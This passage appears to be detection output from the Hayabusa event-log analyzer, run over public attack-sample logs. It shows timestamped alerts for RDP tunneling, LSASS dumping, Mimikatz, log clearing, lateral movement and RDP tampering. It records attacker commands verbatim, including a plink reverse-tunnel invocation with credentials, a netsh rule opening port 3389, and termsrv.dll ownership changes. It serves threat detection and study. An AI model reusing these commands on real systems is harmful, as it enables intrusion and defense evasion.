Localhost,,rules/sigma/builtin/security/win_rdp_localhost_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-14 00:29:40.657 +09:00,PC02.example.corp,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: PC02 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x4a26d : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-14 00:31:19.529 +09:00,PC02.example.corp,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON : Workstation: PC01 : IP Address: 10.0.2.17 : Port: 49168 : LogonID: 0x73d02,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-14 00:31:31.556 +09:00,PC02.example.corp,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON : Workstation: PC01 : IP Address: 10.0.2.17 : Port: 49169 : LogonID: 0x7d4f4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-14 03:01:41.593 +09:00,PC01.example.corp,1102,high,Security log was cleared,User: admin01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:02:04.426 +09:00,PC01.example.corp,4624,informational,Logon Type 11 - CachedInteractive,User: user01 : Workstation: PC01 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1414c8 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-11-CachedInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 
03:02:04.426 +09:00,PC01.example.corp,4648,informational,Explicit Logon,Source User: PC01$ : Target User: user01 : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:02:04.526 +09:00,PC01.example.corp,4648,informational,Explicit Logon,Source User: PC01$ : Target User: user01 : IP Address: - : Process: C:\Windows\System32\lsass.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:02:04.526 +09:00,PC01.example.corp,4624,informational,Logon Type 7 - Unlock,User: user01 : Workstation: PC01 : IP Address: - : Port: - : LogonID: 0x1414d9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-7-Unlock.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:01.632 +09:00,PC01.example.corp,5156,high,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:01.632 +09:00,PC01.example.corp,5156,high,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:43.171 +09:00,PC01.example.corp,4672,informational,Admin Logon,User: admin01 : LogonID: 0x14871d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:45.905 +09:00,PC01.example.corp,5156,high,RDP over Reverse SSH Tunnel 
WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:45.905 +09:00,PC01.example.corp,5156,high,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:57.442 +09:00,PC01.example.corp,4672,informational,Admin Logon,User: admin01 : LogonID: 0x148f5d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,informational,Logon Type 10 - RDP (Remote Interactive),User: admin01 : Workstation: PC01 : IP Address: 127.0.0.1 : Port: 49274 : LogonID: 0x14a321 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-10-RemoteInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4672,informational,Admin Logon,User: admin01 : LogonID: 0x14a321,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4648,informational,Explicit Logon,Source User: PC01$ : Target User: admin01 : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,high,RDP Login from Localhost,,rules/sigma/builtin/security/win_rdp_localhost_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:58.363 
+09:00,PC01.example.corp,4624,low,Admin User Remote Logon,,rules/sigma/builtin/security/win_admin_rdp_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: plink.exe 10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127.0.0.2:3389 -l test -pw test : Path: C:\Users\IEUser\Desktop\plink.exe : User: PC01\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,high,Suspicious Plink Remote Forwarding,,rules/sigma/process_creation/sysmon_susp_plink_remote_forward.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,medium,Exfiltration and Tunneling Tools Execution,,rules/sigma/process_creation/win_exfiltration_and_tunneling_tools_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:02:48.502 +09:00,PC01.example.corp,3,high,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:03:48.058 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: PC01\IEUser : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.141 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
\SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.151 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.221 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.351 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.892 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.892 
+09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.962 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:05.092 +09:00,PC01.example.corp,3,high,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:05.283 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:05.563 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\TSTheme.exe -Embedding : Path: C:\Windows\System32\TSTheme.exe : User: PC01\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and 
Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:26.499 +09:00,PC01.example.corp,1,informational,Process Creation,Command: atbroker.exe : Path: C:\Windows\System32\AtBroker.exe : User: PC01\IEUser : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:06:38.843 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe $(Arg0) : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-17 02:54:26.956 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 02:54:26.956 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 02:55:47.181 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 02:55:47.181 +09:00,PC01.example.corp,5145,informational,Network Share File 
Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 02:57:41.475 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 02:57:41.475 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32 : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32 : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32 : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32 : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.522 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-03-18 04:09:41.328 +09:00,PC04.example.corp,11,high,LSASS Memory Dump File Creation,,rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-18 04:09:41.328 +09:00,PC04.example.corp,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-18 04:10:03.991 +09:00,PC04.example.corp,11,high,LSASS Memory Dump File Creation,,rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-18 04:10:03.991 +09:00,PC04.example.corp,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-18 04:26:42.116 +09:00,PC04.example.corp,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/net_share_drive_5142.evtx +2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx +2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx 
+2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx +2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,high,Mimikatz Detection LSASS Access,,rules/sigma/deprecated/sysmon_mimikatz_detection_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx +2019-03-18 05:17:52.949 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat"" : Path: C:\Windows\System32\cmd.exe : User: PC04\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:17:52.979 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst"" -i -o : Path: C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst.exe : User: PC04\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:05.086 +09:00,PC04.example.corp,13,high,RDP Sensitive Settings Changed,,rules/sigma/registry_event/sysmon_rdp_settings_hijack.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:09.282 +09:00,PC04.example.corp,13,high,RDP Registry Modification,,rules/sigma/registry_event/sysmon_rdp_registry_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:09.282 +09:00,PC04.example.corp,13,high,RDP Sensitive 
Settings Changed,,rules/sigma/registry_event/sysmon_rdp_settings_hijack.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: netsh advfirewall firewall add rule name=""Remote Desktop"" dir=in protocol=tcp localport=3389 profile=any action=allow : Path: C:\Windows\System32\netsh.exe : User: PC04\IEUser : Parent Command: ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst"" -i -o",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,medium,Netsh Port or Application Allowed,,rules/sigma/process_creation/win_netsh_fw_add.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,high,Netsh RDP Port Opening,,rules/sigma/process_creation/win_netsh_allow_port_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:09.643 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding : Path: C:\Windows\System32\rundll32.exe : User: PC04\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:12.096 +09:00,PC04.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 220 : Path: C:\Windows\System32\UI0Detect.exe : User: PC04\IEUser : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense 
Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:20:14.512 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" : Path: C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe : User: PC04\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:20:17.907 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\takeown.exe"" /f C:\Windows\System32\termsrv.dll : Path: C:\Windows\System32\takeown.exe : User: PC04\IEUser : Parent Command: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:20:17.917 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: 